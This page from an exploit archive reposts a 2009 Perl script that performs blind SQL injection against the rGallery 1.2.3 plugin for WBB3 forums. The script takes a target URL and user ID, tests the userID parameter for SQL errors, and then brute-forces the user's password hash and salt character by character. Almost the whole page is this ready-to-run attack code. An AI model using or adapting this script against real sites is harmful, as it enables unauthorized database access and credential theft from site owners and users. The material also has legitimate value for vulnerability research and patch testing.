首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WBB3 rGallery 1.2.3 (UserGallery) Blind SQL Injection Exploit
来源:vfocus.net 作者:vfocus 发布时间:2009-03-24   
#!/usr/bin/perl -w

use strict;
use LWP::Simple;

$| = 1;

print q {
#############################
## WBB3 Blind SQL-Injector ##
#### Exploit in rGallery ####
###### by Invisibility ######
#############################
\\\    Special greetz to     #
//  Katharsis/**/nobody     #
\\\    Gunner/**/Cheese      #
//          Thx ;)          #
#############################


};

if (@ARGV < 3) {
 print "Usage: wbb3sploit.pl [url] [user id] [User Gallery userID] \nExample: wbb3sploit.pl www.target.com 1 5\n";
 print "[User Gallery UserID] has to be the ID of a User, who has got pictures.\nExample: www.target.com/index.php?page=RGalleryUserGallery&userID=5\n";
 exit;
}

my $url = shift;
my $uid  = shift;
my $galid  = shift;

my $prefix;

my @charset = ('a','b','c','d','e','f','1','2','3','4','5','6','7','8','9','0');

print "~ Is it vulnerable?...\n";

my $chreq = get("http://".$url."/index.php?page=RGalleryUserGallery&userID='");

if (($chreq =~ m/Fatal error/i) || ($chreq =~ m/Invalid SQL/i)) {

print "Nice, seems to be vulnerable!\n";

} else {

print "Seems to be patched, sorry\n";
exit;

}

print "~ Checking Prefix...\n";

if ($chreq =~ m/_wcf/i) {

 print "~ Found Prefix '$1'\n";
 $prefix = $1;

} else {
 print "~ Can't find prefix, using 'wcf1_'\n";
 $prefix = "wcf1_";
}

print "~ Exploiting...\n";
print "~^~ Hash: ";

my $counter = 1;
my $countersalt = 1;

while($counter < 41) {

foreach(@charset) {

 my $ascode       = ord($_);
 my $result       = get("http://".$url."/index.php?page=RGalleryUserGallery&userID=".$galid."/**/AND/**/ascii(substring((SELECT/**/password/**/FROM/**/".$prefix."user/**/WHERE/**/userid=".$uid."),".$counter."))=".$ascode."");

 if (length($result) != 0) {
  if ($result =~ "Keine") {
  }
  else{
   print chr($ascode);
   $counter++;
   }
  }
 }
}
my $saltcheck = get("http://".$url."/index.php?page=RGalleryUserGallery&userID=".$galid."/**/AND/**/ascii(substring((SELECT/**/salt/**/FROM/**/".$prefix."user/**/WHERE/**/userid=".$uid."),1))>0");
if($saltcheck =~ "Keine")
{
}
else
{
print "\n~^~ Salt: ";
while($countersalt < 41) {

foreach(@charset) {

 my $ascodesalt       = ord($_);
 my $resultsalt       = get("http://".$url."/index.php?page=RGalleryUserGallery&userID=".$galid."/**/AND/**/ascii(substring((SELECT/**/salt/**/FROM/**/".$prefix."user/**/WHERE/**/userid=".$uid."),".$countersalt."))=".$ascodesalt."");

 if (length($resultsalt) != 0) {
  if ($resultsalt =~ "Keine") {
  }
  else{
   print chr($ascodesalt);
   $countersalt++;
   }
  }
 }
}
}
print "\n~ Done! Exploit by Invisibility\n";

# [2009-03-23]
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·CloneCD/DVD (ElbyCDIO.sys < 6.
·SuperNews 1.5 (valor.php notic
·Racer 0.5.3b5 Remote Stack Buf
·Sysax Multi Server 4.3 Remote
·BS.Player 2.34 (.bsl) Universa
·Orbit Downloader 2.8.7 Arbitra
·BS.Player <= 2.34 Build 980 (.
·X-BLC 0.2.0 (get_read.php sect
·POP Peeper 3.4.0.0 (From) Remo
·FreeBSD 7.x (Dumping Environme
·Hannon Hill Cascade Server Com
·Gigaset SE461 WiMAX router Rem
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved